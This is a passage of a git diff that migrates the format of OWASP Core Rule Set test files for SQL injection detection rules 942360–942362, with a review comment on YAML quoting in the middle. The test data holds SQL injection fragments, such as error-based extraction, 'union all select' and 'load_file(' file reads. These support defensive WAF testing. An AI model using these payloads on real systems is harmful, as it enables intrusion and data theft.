80 + uri: "/post" + data: "(SELECT 4440 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(4440=4440,1))),0x7170716271,FLOOR" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 39 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "2759399466.1534185336 -6863 union all select 1,1,1,1,1,1,1,1,1,CONCAT" - version: HTTP/1.0 - output: - log_contains: id "942360" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "2759399466.1534185336 -6863 union all select 1,1,1,1,1,1,1,1,1,CONCAT" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml index 7c36f4b..259cc79 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml 
@@ -1,126 +1,124 @@ --- meta: author: "Christoph Hansen, azurit" - description: None - enabled: true - name: 942361.yaml +rule_id: 942361 tests: - - test_title: 942361-1 + - test_id: 1 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "'alter a" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "'alter a" + version: HTTP/1.0 + output: + log: + expect_ids: [942361] + - test_id: 2 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\" ALTER A" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\" ALTER A" + version: HTTP/1.0 + output: + log: + expect_ids: [942361] + - test_id: 3 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "'ALTER A" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "'ALTER A" + version: HTTP/1.0 + output: + log: + expect_ids: [942361] + - test_id: 4 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "' alter/" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "' alter/" + version: HTTP/1.0 + output: + log: + expect_ids: [942361] + - test_id: 5 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\" UNION A" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\" UNION A" + version: HTTP/1.0 + output: + log: + expect_ids: [942361] + - test_id: 6 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "'UNION A" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "'UNION A" + version: HTTP/1.0 + output: + log: + expect_ids: [942361] + - test_id: 7 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "' union/" - version: HTTP/1.0 - output: - log_contains: id "942361" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "' union/" + version: HTTP/1.0 + output: + log: + expect_ids: [942361] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml index 97a2dc3..27c6d2d 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml 
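Review bot: The `Accept` header value is written as an unquoted plain scalar in all seven stages of this hunk (`Accept: text/xml,...,image/png,*/*;q=0.5`), while the `942360.yaml` stages just above and tests 30–32 of `942362.yaml` in the same commit quote it. The plain form parses only because `*/*` does not open the scalar (a leading `*` would be read as an alias), so it is fragile under later edits and inconsistent within one migration; consider `Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"` in each stage. The seven tests also share the identical `desc`; naming the variant each one exercises (quote style, keyword case, trailing `/`) would make a failing test self-explanatory in the runner output.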
+++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml 
@@ -1,552 +1,550 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Buehler, azurit" - description: None - enabled: true - name: 942362.yaml +rule_id: 942362 tests: - - test_title: 942362-1 + - test_id: 1 desc: "concatenated basic SQL injection and SQLLFI" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # 23423 as "sdfsdfs" FROM table - data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # 23423 as "sdfsdfs" FROM table + data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 2 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "select Char(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "select Char(" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 3 desc: "Detects concatenated basic SQL injection 
and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT CHAR(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT CHAR(" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 4 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT GROUP_CONCAT(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT GROUP_CONCAT(" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 5 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT group_cOnCat(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 
942362-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT group_cOnCat(" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 6 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") as cc FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") as cc FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 7 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS orders FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS orders FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 8 desc: "Detects concatenated basic SQL 
injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS `carrier_id` from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS `carrier_id` from" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 9 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "select load_file(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "select load_file(" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 10 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS Role FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - 
- test_title: 942362-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS Role FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 11 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `edit_user_id` from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `edit_user_id` from" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 12 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS val FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS val FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 13 desc: 
"Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=%60+REGEXP%20" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=%60+REGEXP%20" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 14 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS 'Durchschnitt_Importzeit' FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS 'Durchschnitt_Importzeit' FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 15 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS 
`OXTIMESTAMP` from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `OXTIMESTAMP` from" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 16 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") as col_0_0_ from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") as col_0_0_ from" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 17 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS `count` FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS `count` FROM" 
+ version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 18 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS schlagwoerter FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS schlagwoerter FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 19 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") as User from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") as User from" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 20 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: 
POST - port: 80 - uri: "/post" - data: ") AS t FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS t FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 21 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "(load_file(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "(load_file(" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 22 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") as ExecuteTheseSQLCommands FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + 
data: ") as ExecuteTheseSQLCommands FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 23 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS schlagwoerter FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS schlagwoerter FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 24 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `documentType` FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `documentType` FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 25 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "! As' from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-26 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "! As' from" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 26 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "; As not from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-27 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "; As not from" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 27 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT load_file(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-28 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
